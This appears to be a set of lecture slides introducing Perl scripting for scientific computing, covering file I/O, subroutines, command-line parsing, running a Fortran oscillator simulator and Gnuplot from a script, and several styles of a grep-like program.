$infilename = $ARGV[0]; $outfilename = $ARGV[1];but this is less perl-ish |

![]() | What if the user fails to provide two command-line arguments?
die "Usage: $0 infilename outfilename" if $#ARGV < 1; # $#ARGV is the largest valid index in @ARGV, # the length of @ARGV is then $#ARGV+1 (first index is 0) |
![]() | die terminates the program (with exit status different from 0) |

![]() | Open files:
open(INFILE, "<$infilename"); # open for reading open(OUTFILE, ">$outfilename"); # open for writing open(APPFILE, ">>$outfilename"); # open for appending |
![]() | Read line by line:
while (defined($line=<INFILE>)) {
# process $line
}
|

sub myfunc {
my ($y) = @_;
# all arguments to the function are stored
# in the array @_
# the my keyword defines local variables
# more general example on extracting arguments:
# my ($arg1, $arg2, $arg3) = @_;
if ($y >= 0.0) {
return $y**5.0*exp(-$y);
}
else {
return 0.0;
}
}
Functions can be put anywhere in a file

![]() | Input file format: two columns of numbers
0.1 1.4397 0.2 4.325 0.5 9.0 |
![]() | Read (x,y), transform y, write (x,f(y)):
while (defined($line=<INFILE>)) {
($x,$y) = split(' ', $line); # extract x and y value
$fy = myfunc($y); # transform y value
printf(OUTFILE "%g %12.5e\n", $x, $fy);
}
|
![]() | Close files:
close(INFILE); close(OUTFILE); |

![]() | The script runs without error messages if the file does not exist (recall that Python by default issues error messages in case of non-existing files) |
![]() | In Perl we should test explicitly for successful operations and issue error messages
open(INFILE, "<$infilename")
or die "unsuccessful opening of $infilename; $!\n";
# $! is a variable containing the error message from
# the operating system ('No such file or directory' here)
|

: # *-*-perl-*-*
eval 'exec perl -w -S $0 ${1+"$@"}'
if 0; # if running under some shell
die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
($infilename, $outfilename) = @ARGV;
open(INFILE, "<$infilename") or die "$!\n";
open(OUTFILE, ">$outfilename") or die "$!\n";
sub myfunc {
my ($y) = @_;
if ($y >= 0.0) { return $y**5.0*exp(-$y); }
else { return 0.0; }
}

![]() | Perl has a flexible syntax:
if ($#ARGV < 1) {
die "Usage: $0 infilename outfilename\n";
}
die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
Parenthesis can be left out from function calls:
open INFILE, "<$infilename"; # open for reading |
![]() | Functions (subroutines) extract arguments from the list @_ |
![]() | Subroutine variables are global by default; the my prefix make them local |

# read one line at a time:
while (defined($line=<INFILE>)) {
($x, $y) = split(' ', $line); # extract x and y value
$fy = myfunc($y); # transform y value
printf(OUTFILE "%g %12.5e\n", $x, $fy);
}
close(INFILE); close(OUTFILE);

![]() | Read input file into list of lines:
@lines = <INFILE>; |
![]() | Store x and y data in arrays:
# go through each line and split line into x and y columns
@x = (); @y = (); # store data pairs in two arrays x and y
for $line (@lines) {
($xval, $yval) = split(' ', $line);
push(@x, $xval); push(@y, $yval);
}
|

![]() | For-loop in Perl:
for ($i = 0; $i <= $last_index; $i++) { ... }
|
![]() | Loop over (x,y) values:
open(OUTFILE, ">$outfilename")
or die "unsuccessful opening of $outfilename; $!\n";
for ($i = 0; $i <= $#x; $i++) {
$fy = myfunc($y[$i]); # transform y value
printf(OUTFILE "%g %12.5e\n", $x[$i], $fy);
}
close(OUTFILE);
|

![]() | Perl distinguishes between array and list |
![]() | Short story: array is the variable, and it can have a list or its length as values, depending on the context
@myarr = (1, 99, 3, 6); # array list |
![]() | List context: the value of @myarr is a list
@q = @myarr; # array q gets the same entries as @myarr |
![]() | Scalar context: the value of @myarr is its length
$q = @myarr; # q becomes the no of elements in @myarr |

![]() | Can use the array as loop limit:
for ($i = 0; $i < @x; $i++) {
# work with $x[$i] ...
}
|
![]() | Can test on @ARGV for the number of command-line arguments:
die "Usage: $0 infilename outfilename" unless @ARGV >= 2; # instead of die "Usage: $0 infilename outfilename" if $#ARGV < 1; |

![]() | Method 1: write just the name of the scriptfile:
./datatrans1.pl infile outfileor datatrans1.pl infile outfileif . (current working directory) or the directory containing datatrans1.pl is in the path |
![]() | Method 2: run an interpreter explicitly:
perl datatrans1.pl infile outfileUse the first perl program found in the path |
![]() | On Windows machines one must use method 2 |

![]() | In method 1, the first line specifies the interpreter |
![]() | Explicit path to the interpreter:
#!/usr/local/bin/perl #!/usr/home/hpl/scripting/Linux/bin/perl |
![]() | Using env to find the first Perl interpreter in the path
#!/usr/bin/env perlis not a good idea because it does not always work with #!/usr/bin/env perl -wi.e. Perl with warnings (ok on SunOS, not on Linux) |

![]() | Using Bourne shell to find the first Perl interpreter
in the path:
: # *-*-perl-*-*
eval 'exec perl -w -S $0 ${1+"$@"}'
if 0; # if running under some shell
Run src/perl/headerfun.sh for in-depth explanation
|
![]() | The latter header makes it easy to move scripts from one machine to another |
![]() | Nevertheless, sometimes you need to ensure that all users applies a specific Perl interpreter |



Code: oscillator (written in Fortran 77)

![]() | Input: m, b, c, and so on read from standard input |
![]() | How to run the code:
oscillator < filewhere file can be 3.0 0.04 1.0 ... |
![]() | Results (t, y(t)) in a file sim.dat |



![]() | Commands:
set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...'; # screen plot: (x,y) data are in the file sim.dat plot 'sim.dat' title 'y(t)' with lines; # hardcopies: set size ratio 0.3 1.5, 1.0; set term postscript eps mono dashed 'Times-Roman' 28; set output 'case.ps'; plot 'sim.dat' title 'y(t)' with lines; # make a plot in PNG format as well: set term png small; set output 'case.png'; plot 'sim.dat' title 'y(t)' with lines; |
![]() | Commands can be given interactively or put in file |

![]() | Change oscillating system parameters by editing the simulator input file |
![]() | Run simulator:
oscillator < inputfile |
![]() | Plot:
gnuplot -persist -geometry 800x200 case.gp(case.gp contains Gnuplot commands) |
![]() | Plot annotations must be consistent with inputfile |
![]() | Let's automate! |

![]() | Usage:
./simviz1.pl -m 3.2 -b 0.9 -dt 0.01 -case run1Sensible default values for all options |
![]() | Put simulation and plot files in a subdirectory (specified by -case run1) |

![]() | Set default values of m, b, c etc. |
![]() | Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc. |
![]() | Create and move to subdirectory |
![]() | Write input file for the simulator |
![]() | Run simulator |
![]() | Write Gnuplot commands in a file |
![]() | Run Gnuplot |

![]() | Set default values of the script's input parameters:
$m = 1.0; $b = 0.7; $c = 5.0; $func = "y"; $A = 5.0; $w = 2*3.14159; $y0 = 0.2; $tstop = 30.0; $dt = 0.05; $case = "tmp1"; $screenplot = 1; |
![]() | Examine command-line options:
# read variables from the command line, one by one:
while (@ARGV) {
$option = shift @ARGV; # load cmd-line arg into $option
if ($option eq "-m") {
$m = shift @ARGV; # load next command-line arg
}
elsif ($option eq "-b") { $b = shift @ARGV; }
...
}
shift 'eats' (extracts and removes) the first array element
|

use Getopt::Long; # load module with GetOptions function
GetOptions("m=f" => \$m, "b=f" => \$b, "c=f" => \$c,
"func=s" => \$func, "A=f" => \$A, "w=f" => \$w,
"y0=f" => \$y0, "tstop=f" => \$tstop,
"dt=f" => \$dt, "case=f" => \$case,
"screenplot!" => \$screenplot);
# explanations:
"m=f" => \$m
# command-line option --m or -m requires a float (f)
# variable, e.g., -m 5.1 sets $m to 5.1
"func=s" => \$func
# --func string (result in $func)
"screenplot!" => \$screenplot
# --screenplot turns $screenplot on,
# --noscreenplot turns $screenplot off

![]() | Perl has a rich cross-platform operating system interface |
![]() | Safe, cross-platform creation of a subdirectory:
$dir = $case;
use File::Path; # contains the rmtree function
if (-d $dir) { # does $dir exist?
rmtree($dir); # remove directory
print "deleting directory $dir\n";
}
mkdir($dir, 0755)
or die "Could not create $dir; $!\n";
chdir($dir)
or die "Could not move to $dir; $!\n";
|

open(F,">$case.i") or die "open error; $!\n";
print F "
$m
$b
$c
$func
$A
$w
$y0
$tstop
$dt
";
close(F);
Double-quoted strings can be used for multi-line output

![]() | Stand-alone programs can be run as
system "$cmd"; # $cmd is the command to be run # examples: system "myprog < input_file"; system "ls *.ps"; # valid, but bad - Unix-specific |
![]() | Safe execution of our simulator:
$cmd = "oscillator < $case.i"; $failure = system($cmd); die "running the oscillator code failed\n" if $failure; |

![]() | Make Gnuplot script:
open(F, ">$case.gnuplot"); # print multiple lines using a "here document" print F <<EOF; set title '$case: m=$m b=$b c=$c f(y)=$func ...'; ... EOF close(F); |
![]() | Run Gnuplot:
$cmd = "gnuplot -geometry 800x200 -persist $case.gnuplot"; $failure = system($cmd); die "running gnuplot failed\n" if $failure; |

![]() | Double-quoted strings:
print "\ Here is some multi-line text with a variable $myvar inserted. Newlines are preserved. " |
![]() | 'Here document':
print FILE <<EOF Here is some multi-line text with a variable $myvar inserted. Newlines are preserved. EOFNote: final EOF must start in 1st column! |

![]() | All Perl functions can be used without parenthesis in calls:
open(F, "<$somefile\"); # with parenthesis open F, "<$somefile\"; # without parenthesisMore examples: printf F "%5d: %g\n", $i, $result; system "./myapp -f 0"; |
![]() | If-like tests can proceed the action:
printf F "%5d: %g\n", $i, $result unless $counter > 0;
# equivalent C-like syntax:
if (!$counter > 0) {
printf(F "%5d: %g\n", $i, $result);
}
|
![]() | This Perl syntax makes scripts easier to read |

![]() | = There Is More Than One Way To Do It |
![]() | TIMTOWTDI is a Perl philosophy |
![]() | These notes: emphasis on one verbose (easy-to-read) way to do it |
![]() | Nevertheless, you need to know several Perl programming styles to understand other people's codes! |
![]() | Example of TIMTOWTDI: a Perl grep program |

![]() | Suppose you want to find all lines in a C file containing the string superLibFunc |
![]() | Unix grep is handy for this purpose:
grep superLibFunc myfile.cprints the lines containing superLibFunc |
![]() | Can also search for text patterns (regular expressions) |

![]() | Experienced Perl programmer:
$string = shift;
while (<>) { print if /$string/o; }
|
![]() | Lazy Perl user:
perl -n -e 'print if /superLibFunc/;' file1 file2 file3 |
![]() | Eh, Perl has a grep command...
$string = shift; print grep /$string/, <>; |
![]() | Confused? Next slide is for the novice |

#!/usr/bin/perl
die "Usage: $0 string file1 file2 ...\n" if $#ARGV < 1;
# first command-line argument is the string to search for:
$string = shift @ARGV; # = $ARGV[0];
# run through the next command-line arguments,
# i.e. run through all files, load the file and grep:
while (@ARGV) {
$file = shift @ARGV;
if (-f $file) {
open(FILE,"<$file");
@lines = <FILE>; # read all lines into a list
foreach $line (@lines) {
# check if $line contains the string $string:
if ($line =~ /$string/) { # regex match?
print "$file: $line";
}
}
}
}

![]() | Lazy Perl programmers make use of the implicit underscore variable:
foreach (@files) {
if (-f) {
open(FILE,"<$_");
foreach (<FILE>) {
if (/$string/) {
print;
}}}}
|
![]() | The fully equivalent code is
foreach $_(@files) {
if (-f $_) {
open(FILE,"<$_");
foreach $_(<FILE>) {
if ($_ =~ /$string/) {
print $_;
}}}}
|

![]() | With use of dollar underscore:
die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
($string, @files) = @ARGV;
foreach (@files) {
next unless -f; # jump to next loop pass
open FILE, $_;
foreach (<FILE>) { print if /$string/; }
}
|
![]() | Without dollar underscore:
die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
($string, @files) = @ARGV;
foreach $file (@files) {
next unless -f $file;
open FILE, $file;
foreach $line (<FILE>) {
print $line if $line =~ /$string/;
}}
|
